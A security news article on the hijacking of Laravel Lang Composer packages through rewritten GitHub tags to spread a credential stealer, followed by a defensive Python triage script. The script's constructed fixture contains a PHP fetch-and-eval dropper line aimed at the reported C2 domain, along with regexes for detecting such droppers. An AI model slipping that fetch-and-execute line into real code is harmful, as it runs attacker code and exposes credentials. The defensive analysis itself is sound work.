
Laravel Lang Packages Hacked: Attackers Distribute Malware to Steal Credentials

The Bottom Line: Attackers compromised Laravel Lang packages by manipulating GitHub tags and distributed malware that steals credentials, cryptographic keys, cloud credentials, and browser data.

An attack on the Laravel Lang localization packages has exposed developers to significant risk. The attackers rewrote GitHub tags so that Composer delivered credential-stealing code to anyone who resolved the affected versions.

Security firms such as StepSecurity, Aikido Security, and Socket have warned of a sophisticated supply-chain attack. The attackers employed an unusual tactic: rather than publishing new malicious versions, they manipulated existing GitHub tags in four Laravel Lang repositories – laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and possibly laravel-lang/actions.

The attackers rewrote hundreds of historical tags so that they pointed at malicious commits in attacker-controlled forks. Approximately 233 versions across three repositories, and possibly up to 700 historical versions in total, were affected. Because a tagged version resolves to whatever commit the tag currently references, developers who resolved those versions afresh (composer require, composer update, or an install without a committed composer.lock) received the malware instead of the legitimate release; a composer install that honours an existing lock file keeps the commit reference recorded there.

The injected malware was hidden in a file named ‘src/helpers.php’, registered under the package’s Composer autoload ‘files’ entries, so it executed whenever the application included the Composer autoloader, without any code calling it. This dropper fetched a second-stage payload from the command-and-control server flipboxstudio[.]info.
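As an added triage example (not code from the article or from the laravel-lang project), the Python script below checks a project for the two things the reporting above describes: packages whose Composer autoload ‘files’ entries pull suspicious PHP into every autoloader include, and composer.lock entries whose commit reference no longer matches a pin taken before the incident. The C2 domain is the one reported; the detection heuristics, the sample vendor tree, the sample lock file, and all versions and commit hashes are constructed for the demo and are not the real payload or real package data.

```python
"""Triage a Composer vendor tree and lock file after the Laravel Lang tag hijack.

Added example for this article, not code from the page or from the laravel-lang
project. Assumes the standard vendor/<vendor>/<name>/ layout, the indicators the
article reports (dropper at src/helpers.php run via Composer autoloading, C2 at
flipboxstudio[.]info) and a caller-supplied allowlist of known-good commits. The
heuristics, sample vendor tree, sample lock and pins below are all constructed.
"""
import glob
import json
import os
import re
import tempfile

C2_DOMAIN = "flipboxstudio.info"  # the article writes it defanged
TARGET_VENDOR = "laravel-lang"
INDICATORS = {  # generic PHP dropper heuristics, not the real payload's code
    "c2_domain": re.compile(re.escape(C2_DOMAIN), re.I),
    "eval_decode": re.compile(r"\beval\s*\(\s*(?:gz\w+|str_rot13|base64_decode)\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I),
}

def autoload_files(vendor_dir):
    """Yield (package, relative path) for every composer.json autoload 'files' entry.
    Such files are included on every require of vendor/autoload.php, which is
    why a dropper placed there runs without any application code calling it."""
    for manifest in sorted(glob.glob(os.path.join(vendor_dir, "*", "*", "composer.json"))):
        with open(manifest, encoding="utf-8") as fh:
            meta = json.load(fh)
        package = os.path.relpath(os.path.dirname(manifest), vendor_dir)
        for rel in meta.get("autoload", {}).get("files", []):
            yield package, rel

def scan_file(path):
    """Return the indicator names matching the file's contents."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(key for key, rx in INDICATORS.items() if rx.search(text))

def triage_vendor(vendor_dir):
    """Report autoloaded files matching an indicator, plus any laravel-lang
    package that autoloads src/helpers.php, the path the article names."""
    findings = []
    for package, rel in autoload_files(vendor_dir):
        full = os.path.join(vendor_dir, package, rel)
        hits = set(scan_file(full)) if os.path.isfile(full) else set()
        if package.startswith(TARGET_VENDOR + "/") and rel == "src/helpers.php":
            hits.add("laravel_lang_helpers")
        if hits:
            findings.append({"package": package, "file": rel, "indicators": sorted(hits)})
    return findings

def lock_references(lock_text, vendor=TARGET_VENDOR):
    """Map each locked package of the vendor to (version, source commit)."""
    refs = {}
    for section in ("packages", "packages-dev"):
        for pkg in json.loads(lock_text).get(section, []):
            if pkg["name"].startswith(vendor + "/"):
                refs[pkg["name"]] = (pkg["version"], pkg.get("source", {}).get("reference"))
    return refs

def drifted_references(refs, known_good):
    """Packages whose locked commit differs from the pin for the same version.
    composer install reuses the commit recorded in composer.lock, so a moved tag
    only lands when the version is resolved again; diffing a fresh lock against
    pins taken before the incident shows which entries were re-resolved."""
    return {name: (ver, sha) for name, (ver, sha) in refs.items()
            if (name, ver) in known_good and known_good[(name, ver)] != sha}

# Constructed fixtures: versions, commit hashes and file contents are made up.
SHA_ORIG, SHA_OK, SHA_BAD = "0" * 39 + "1", "0" * 39 + "2", "0" * 39 + "9"
KNOWN_GOOD = {("laravel-lang/lang", "1.0.0"): SHA_ORIG, ("laravel-lang/attributes", "1.0.0"): SHA_OK}
SAMPLE_LOCK = json.dumps({"packages-dev": [], "packages": [
    {"name": "laravel-lang/lang", "version": "1.0.0", "source": {"reference": SHA_BAD}},
    {"name": "laravel-lang/attributes", "version": "1.0.0", "source": {"reference": SHA_OK}},
]})
MANIFEST = json.dumps({"autoload": {"files": ["src/helpers.php"]}})
SAMPLE_TREE = {
    "acme/util/composer.json": MANIFEST,
    "acme/util/src/helpers.php": "<?php\nfunction acme_trim(string $s): string { return trim($s); }\n",
    "laravel-lang/lang/composer.json": MANIFEST,
    "laravel-lang/lang/src/helpers.php": "<?php\n// constructed stand-in for a dropper\n"
        f"$u = 'https://{C2_DOMAIN}/x';\n@eval(base64_decode(@file_get_contents($u)));\n",
}

def run_demo():
    """Write the sample tree to a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_TREE.items():
            os.makedirs(os.path.join(tmp, os.path.dirname(rel)), exist_ok=True)
            with open(os.path.join(tmp, rel), "w", encoding="utf-8") as fh:
                fh.write(content)
        findings = triage_vendor(tmp)
    return findings, drifted_references(lock_references(SAMPLE_LOCK), KNOWN_GOOD)

if __name__ == "__main__":
    print(json.dumps(dict(zip(("vendor", "lock_drift"), run_demo())), indent=2))
```

Against a real project, call `triage_vendor("vendor")` and `lock_references(open("composer.lock").read())`; the pins passed to `drifted_references` must come from a lock file or SBOM captured before the tags were moved, since the current tags themselves cannot serve as the reference.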

The second-stage PHP payload is a sophisticated, cross-platform credential stealer for Linux, macOS, and Windows. It harvests cloud credentials, Kubernetes secrets, Vault tokens, Git credentials, CI/CD secrets, SSH keys, browser data, cryptocurrency wallets, password manager data, and .env files. Using regular expressions, it extracts AWS keys, GitHub tokens, Slack secrets, Stripe API keys, database credentials, and cryptocurrency recovery phrases from the collected material.

On Windows systems, the malware additionally unpacks an embedded component named ‘DebugElevator’, which extracts and exfiltrates browser data and the associated encryption keys from Chrome, Brave, and Edge.
